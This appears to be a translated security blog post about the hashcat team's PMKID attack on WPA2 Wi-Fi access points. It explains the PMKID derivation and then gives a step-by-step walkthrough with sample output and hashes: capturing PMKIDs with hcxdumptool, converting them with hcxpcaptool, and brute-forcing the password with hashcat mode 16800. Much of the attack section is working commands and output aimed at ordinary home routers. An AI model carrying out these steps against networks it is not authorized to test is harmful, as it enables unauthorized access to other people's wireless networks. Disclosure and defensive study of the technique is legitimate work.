New attack technique WPA2, does not require a client on the AP

https://hashcat.net/forum/thread-7717.html
  • Transfer
image

 
Participants in the hashcat project discovered a new attack vector on the wireless standard WPA2, which does not require the classic interception of a “handshake” between the client and the access point. This vulnerability has been identified through a study of the potential security problems of the new WPA3 protocol.


The main difference from the existing attacks is that in this attack a full 4-way handshake EAPOL is not required. A new attack is performed in the RSN IE (Robust Security Network Information Element), and for its successful replay a single EAPOL frame is enough.


Currently, it is not known for how many routers this method will work - most likely for all existing 802.11i / p / q / r networks with roaming features enabled, and this is the majority of modern routers.


The main features of the new attack:


  • No need to wait for clients - AP is attacked directly;
  • no need to wait for a full 4-way handshake between the client and the AP;
  • lack of frame retransmission EAPOL;
  • eliminates the possibility of capturing incorrect passwords from the client;
  • loss of EAPOL frames in case of distance / loss of communication with the client;
  • high speed due to the lack of need to fix nonce and replaycounter values;
  • there is no need for a specialized output data format (pcap, hccapx, etc.) - the captured data is stored as hex strings.

Attack Details


RSN IE is an optional field that can be found as part of 802.11 management. One of the RSN capabilities is PMKID.


image

PMKID is calculated using HMAC-SHA1, where the key is PMK, and part of the data is the concatenation of the fixed PMK Name string, the access point's MAC address and the station's MAC address. 


PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Since PMK is the same as in the usual four-way handshake EAPOL, this is the ideal attack vector. We get all the necessary data in the first frame of EAPOL from the AP.


The attack will require the following tools (current versions):



Run hcxdumptool to remove PMKID:


$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

start capturing (stopwith ctrl+c)
INTERFACE:...............: wlp39s0f3u4u5
FILTERLIST...............: 0 entries
MAC CLIENT...............: 89acf0e761f4 (client)
MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
EAPOL TIMEOUT............: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER............: 62083
ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

On the successful completion of the attack (average duration of 10 minutes) notify FOUND PMKID:


[13:29:57 - 011] 89acf0e761f4-> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4][13:29:57 - 011] 4604ba734d4e-> 89acf0e761f4[ASSOCIATIONRESPONSE, SEQUENCE 1206][13:29:57 - 011] 4604ba734d4e-> 89acf0e761f4[FOUND PMKID]

After that, you need to convert the data:


$ ./hcxpcaptool -z test.16800test.pcapng

start reading from test.pcapng
summary:
--------file name....................: test.pcapng
file type....................: pcapng 1.0file hardware information....: x86_64
file os information..........: Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: littleendianread errors..................: flawless
packets inside...............: 66
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 1
probe responses..............: 11
association requests.........: 5
association responses........: 5
authentications (OPENSYSTEM): 13
authentications (BROADCOM)...: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 11 PMKID(s) written totest.16800

which after conversion will take the following form:


2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a

hex values ​​of the following data types: 


PMKID*MAC AP*MAC Station*ESSID

Next, it remains to “feed” the obtained results to the hashcat utility (yes, there is nowhere without a brute) and wait for the result:


$ ./hashcat -m 16800 test.16800 -a 3 -w 3'?l?l?l?l?l?lt!'


This technique greatly simplifies and accelerates the attack on most wireless devices due to fewer factors of influence.


PS: this vulnerability affects home / SOHO devices to a greater degree; in the corporate segment, more generally, MGT WPA2 Enterprise with RADIUS keys is used as a rule.


Information Security Center, Jet Infosystems

Tags:

Also popular now: